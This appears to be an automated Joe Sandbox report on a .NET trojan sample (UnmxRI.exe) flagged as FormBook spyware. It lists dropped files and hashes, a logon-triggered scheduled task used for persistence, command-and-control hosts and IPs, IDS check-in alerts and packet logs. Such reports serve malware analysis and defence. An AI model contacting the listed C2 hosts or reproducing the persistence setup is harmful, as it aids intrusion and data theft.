                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.noobblaster.comNUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4497267348.00000000050DC000.00000040.80000000.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.theranchobizarro.com/sitemap.xmlprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.hover.com/?source=parkedNUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                | IP | Domain | Country | ASN | ASN Name | Malicious |
                                |---|---|---|---|---|---|
                                | 122.10.12.59 | 2xin1.zhanghonghong.com | Hong Kong | 134548 | DXTL-HKDXTLTseungKwanOServiceHK | true |
                                | 52.9.242.57 | www.theranchobizarro.com | United States | 16509 | AMAZON-02US | true |
                                | 212.32.237.90 | www.sportspaj.com | Netherlands | 60781 | LEASEWEB-NL-AMS-01NetherlandsNL | true |
                                | 167.172.228.26 | nexgen-gaming.com | United States | 14061 | DIGITALOCEAN-ASNUS | true |
                                | 91.195.240.19 | parkingpage.namecheap.com | Germany | 47846 | SEDO-ASDE | true |
                                | 66.29.154.248 | www.slimdut.top | United States | 19538 | ADVANTAGECOMUS | true |
                                | 104.21.92.135 | www.otomain.info | United States | 13335 | CLOUDFLARENETUS | true |
                                | 119.18.54.85 | gpcamservices.com | India | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true |
                                | 216.40.34.41 | www.hugelmann.org | Canada | 15348 | TUCOWSCA | true |
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1501599
                                Start date and time:2024-08-30 07:17:07 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 11m 42s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:20
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:2
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:UnmxRI.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@23/16@16/9
                                EGA Information:
                                • Successful, ratio: 83.3%
                                HCA Information:
                                • Successful, ratio: 92%
                                • Number of executed functions: 164
                                • Number of non-executed functions: 315
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                | Time | Type | Description |
                                |---|---|---|
                                | 01:17:58 | API Interceptor | 2x Sleep call for process: UnmxRI.exe modified |
                                | 01:18:00 | API Interceptor | 47x Sleep call for process: powershell.exe modified |
                                | 01:18:05 | API Interceptor | 2x Sleep call for process: tehuvFgZlLZK.exe modified |
                                | 01:18:52 | API Interceptor | 11710856x Sleep call for process: print.exe modified |
                                | 07:18:00 | Task Scheduler | Run new task: tehuvFgZlLZK path: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe |
                                Process:C:\Users\user\Desktop\UnmxRI.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:true
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                Process:C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2232
                                Entropy (8bit):5.380805901110357
                                Encrypted:false
                                SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZM0UyuVws:lGLHxvCsIfA2KRHmOugr1Vws
                                MD5:303DBBD911F091D7717712A35F45E8B4
                                SHA1:949B8810A45146500AC2C629EF7313DAED9FDE57
                                SHA-256:ABCF6169028E21565ECEDB05F67AC9130F84CFAE1B5E1FD6BFBE92F541922609
                                SHA-512:F2E8D695F2C1803174C51D1AFE980D39D16F6C1B8B17BF1A565ADF669566C3A9FAFD7985170386577F78D28DBE18DAD3A89149A1F167586087BD057063796B91
                                Malicious:false
                                Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Users\user\Desktop\UnmxRI.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1585
                                Entropy (8bit):5.109234113981608
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt9Kxvn:cgergYrFdOFzOzN33ODOiDdKrsuT0v
                                MD5:5E6C3BBA44F1F71F272A960039D7A7A7
                                SHA1:F9FC46C2E3C7A408274A34A69C3EEE2C6176FE6D
                                SHA-256:90E90821E49A22AAB791091DB1F643886CC59599B19199376FE30EEBAD7F5940
                                SHA-512:A383136577E21840D852741FB1D1F50311015BEE4C2C1012B9852A38B3FE3536D0D15B1EB16ACDD30C2C8CB73E8051E3CF6513686782C0754E78C5B5F3BA9C6A
                                Malicious:true
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                Process:C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1585
                                Entropy (8bit):5.109234113981608
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt9Kxvn:cgergYrFdOFzOzN33ODOiDdKrsuT0v
                                MD5:5E6C3BBA44F1F71F272A960039D7A7A7
                                SHA1:F9FC46C2E3C7A408274A34A69C3EEE2C6176FE6D
                                SHA-256:90E90821E49A22AAB791091DB1F643886CC59599B19199376FE30EEBAD7F5940
                                SHA-512:A383136577E21840D852741FB1D1F50311015BEE4C2C1012B9852A38B3FE3536D0D15B1EB16ACDD30C2C8CB73E8051E3CF6513686782C0754E78C5B5F3BA9C6A
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                Process:C:\Windows\SysWOW64\print.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                Category:dropped
                                Size (bytes):196608
                                Entropy (8bit):1.121297215059106
                                Encrypted:false
                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                Malicious:false
                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\UnmxRI.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1097216
                                Entropy (8bit):6.832565299784811
                                Encrypted:false
                                SSDEEP:12288:iyQaMFM0Mvxv96lPGfGAS3aczHjOpJ5bX9Ek1GgO5vcJX32n4DVRTIVEhbWy:iyjv9olufGasDO1JkgkcJ2nyVRTFhb
                                MD5:E34C33903020A81F3A09A69C29ADE426
                                SHA1:864AAA5821E9F3E99DA71EFF1C8B76BCD1CDEA80
                                SHA-256:C9062D78EE63874928E2D332A8ED0570E99BC06E544E33F002B26F70E0C19510
                                SHA-512:8B7CB1875BF7F9F39759585A5479F330089231B97F07B199728448489368656EC3D7E27F763988A76D3ACECF9E7E093A8A64A83F8F609BC9EC4636379329D9AA
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 66%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e................0.................. ........@.. ....................... ............@.....................................O......................................p............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.........................................................................r...p}.....r...p}......}.....(.......(.....*...0...........sC.....(......o....&.(.....*....0...........s9.....(......o....&.(.....*....0...........s%.....(......o....&.(.....*....0...........s5.....(......o....&.(.....*....0..+.........,..{.......+....,...{....o........(.....*..0..{.............(....s......s....}.....s....}.....s....}.....s....}.....s ...}.....s ...}.....s ...}.....s!...}.....s!...}....
                                Process:C:\Users\user\Desktop\UnmxRI.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Preview:[ZoneTransfer]....ZoneId=0
                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):6.832565299784811
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Windows Screen Saver (13104/52) 0.07%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                File name:UnmxRI.exe
                                File size:1'097'216 bytes
                                MD5:e34c33903020a81f3a09a69c29ade426
                                SHA1:864aaa5821e9f3e99da71eff1c8b76bcd1cdea80
                                SHA256:c9062d78ee63874928e2d332a8ed0570e99bc06e544e33f002b26f70e0c19510
                                SHA512:8b7cb1875bf7f9f39759585a5479f330089231b97f07b199728448489368656ec3d7e27f763988a76d3acecf9e7e093a8a64a83f8f609bc9ec4636379329d9aa
                                SSDEEP:12288:iyQaMFM0Mvxv96lPGfGAS3aczHjOpJ5bX9Ek1GgO5vcJX32n4DVRTIVEhbWy:iyjv9olufGasDO1JkgkcJ2nyVRTFhb
                                TLSH:2A35A03D1DF88227B978D6A6DFA0C432B061D6EFF5629D29D4D746818702A03B4C71BE
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e.................0.................. ........@.. ....................... ............@................................
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0x50d30e
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0xB2BAD165 [Wed Jan 7 21:02:29 2065 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                Name                                  Virtual Address  Virtual Size  Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT          0x10d2b9         0x4f          .text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE        0x10e000         0x594         .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC       0x110000         0xc           .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG           0x10a6d4         0x70          .text
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
                                .text   0x2000           0x10b314      0x10b400  e81c629261b42ce8d76248db295e80f3  False     0.6886245541978484   data       6.837498475160513    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc   0x10e000         0x594         0x600     ca9ed516509c6b92b6eca539635d9ae4  False     0.419921875          data       4.057525652496838    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc  0x110000         0xc           0x200     dc497a787fee1cbd39fc99f6ec350b43  False     0.044921875          data       0.09800417566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                Name         RVA       Size   Type                                                                               Language  Country  ZLIB Complexity
                                RT_VERSION   0x10e090  0x304  data                                                                                                  0.44041450777202074
                                RT_MANIFEST  0x10e3a4  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347
                                DLL          Import
                                mscoree.dll  _CorExeMain
                                Timestamp                        Protocol  SID      Signature                                 Severity  Source Port  Dest Port  Source IP    Dest IP
                                2024-08-30T07:19:13.142223+0200  TCP       2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         49726        80         192.168.2.5  52.9.242.57
                                2024-08-30T07:18:35.434943+0200  TCP       2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         49717        80         192.168.2.5  91.195.240.19
                                2024-08-30T07:21:13.661153+0200  TCP       2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         49750        80         192.168.2.5  91.195.240.19
                                2024-08-30T07:20:51.661641+0200  TCP       2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         49746        80         192.168.2.5  122.10.12.59
                                2024-08-30T07:21:52.389719+0200  TCP       2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         49758        80         192.168.2.5  212.32.237.90
                                2024-08-30T07:19:49.860329+0200  TCP       2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         49734        80         192.168.2.5  119.18.54.85
                                2024-08-30T07:20:24.305204+0200  TCP       2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         49738        80         192.168.2.5  66.29.154.248
                                2024-08-30T07:21:35.712132+0200  TCP       2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         49754        80         192.168.2.5  216.40.34.41
                                2024-08-30T07:20:37.687030+0200  TCP       2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         49742        80         192.168.2.5  104.21.92.135
                                2024-08-30T07:19:35.231734+0200  TCP       2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         49730        80         192.168.2.5  91.195.240.19
                                2024-08-30T07:18:59.865503+0200  TCP       2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         49722        80         192.168.2.5  167.172.228.26
                                2024-08-30T07:22:07.118884+0200  TCP       2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         49762        80         192.168.2.5  167.172.228.26
                                TimestampSource PortDest PortSource IPDest IP
                                Aug 30, 2024 07:21:06.915533066 CEST4974780192.168.2.591.195.240.19
                                Aug 30, 2024 07:21:07.938709021 CEST4974880192.168.2.591.195.240.19
                                Aug 30, 2024 07:21:07.943768024 CEST804974891.195.240.19192.168.2.5
                                Aug 30, 2024 07:21:07.943852901 CEST4974880192.168.2.591.195.240.19
                                Aug 30, 2024 07:21:07.944053888 CEST4974880192.168.2.591.195.240.19
                                Aug 30, 2024 07:21:07.948858976 CEST804974891.195.240.19192.168.2.5
                                Aug 30, 2024 07:21:08.582278013 CEST804974891.195.240.19192.168.2.5
                                Aug 30, 2024 07:21:08.582299948 CEST804974891.195.240.19192.168.2.5
                                Aug 30, 2024 07:21:08.583607912 CEST4974880192.168.2.591.195.240.19
                                Aug 30, 2024 07:21:09.466284990 CEST4974880192.168.2.591.195.240.19
                                Aug 30, 2024 07:21:10.478771925 CEST4974980192.168.2.591.195.240.19
                                Aug 30, 2024 07:21:10.484096050 CEST804974991.195.240.19192.168.2.5
                                Aug 30, 2024 07:21:10.484191895 CEST4974980192.168.2.591.195.240.19
                                Aug 30, 2024 07:21:10.484987974 CEST4974980192.168.2.591.195.240.19
                                Aug 30, 2024 07:21:10.490001917 CEST804974991.195.240.19192.168.2.5
                                Aug 30, 2024 07:21:10.490144014 CEST804974991.195.240.19192.168.2.5
                                Aug 30, 2024 07:21:11.139312983 CEST804974991.195.240.19192.168.2.5
                                Aug 30, 2024 07:21:11.139329910 CEST804974991.195.240.19192.168.2.5
                                Aug 30, 2024 07:21:11.139432907 CEST4974980192.168.2.591.195.240.19
                                Aug 30, 2024 07:21:11.991776943 CEST4974980192.168.2.591.195.240.19
                                Aug 30, 2024 07:21:13.007744074 CEST4975080192.168.2.591.195.240.19
                                Aug 30, 2024 07:21:13.012679100 CEST804975091.195.240.19192.168.2.5
                                Aug 30, 2024 07:21:13.012788057 CEST4975080192.168.2.591.195.240.19
                                Aug 30, 2024 07:21:13.015535116 CEST4975080192.168.2.591.195.240.19
                                Aug 30, 2024 07:21:13.020397902 CEST804975091.195.240.19192.168.2.5
                                Aug 30, 2024 07:21:13.661000967 CEST804975091.195.240.19192.168.2.5
                                Aug 30, 2024 07:21:13.661027908 CEST804975091.195.240.19192.168.2.5
                                Aug 30, 2024 07:21:13.661153078 CEST4975080192.168.2.591.195.240.19
                                Aug 30, 2024 07:21:13.661294937 CEST4975080192.168.2.591.195.240.19
                                Aug 30, 2024 07:21:13.666035891 CEST804975091.195.240.19192.168.2.5
                                Aug 30, 2024 07:21:27.618076086 CEST4975180192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:27.623019934 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:27.623092890 CEST4975180192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:27.623287916 CEST4975180192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:27.628015995 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.140078068 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.140094995 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.140105963 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.140111923 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.140124083 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.140132904 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.140139103 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.140142918 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.140153885 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.140171051 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.140177965 CEST4975180192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:28.140207052 CEST4975180192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:28.145030022 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.145104885 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.145138979 CEST4975180192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:28.157222986 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.157243967 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.157294035 CEST4975180192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:28.227004051 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.227019072 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.227030993 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.227082014 CEST4975180192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:28.227813959 CEST8049751216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:28.227855921 CEST4975180192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:29.133572102 CEST4975180192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:30.148370028 CEST4975280192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:30.153440952 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.153522968 CEST4975280192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:30.153744936 CEST4975280192.168.2.5216.40.34.41
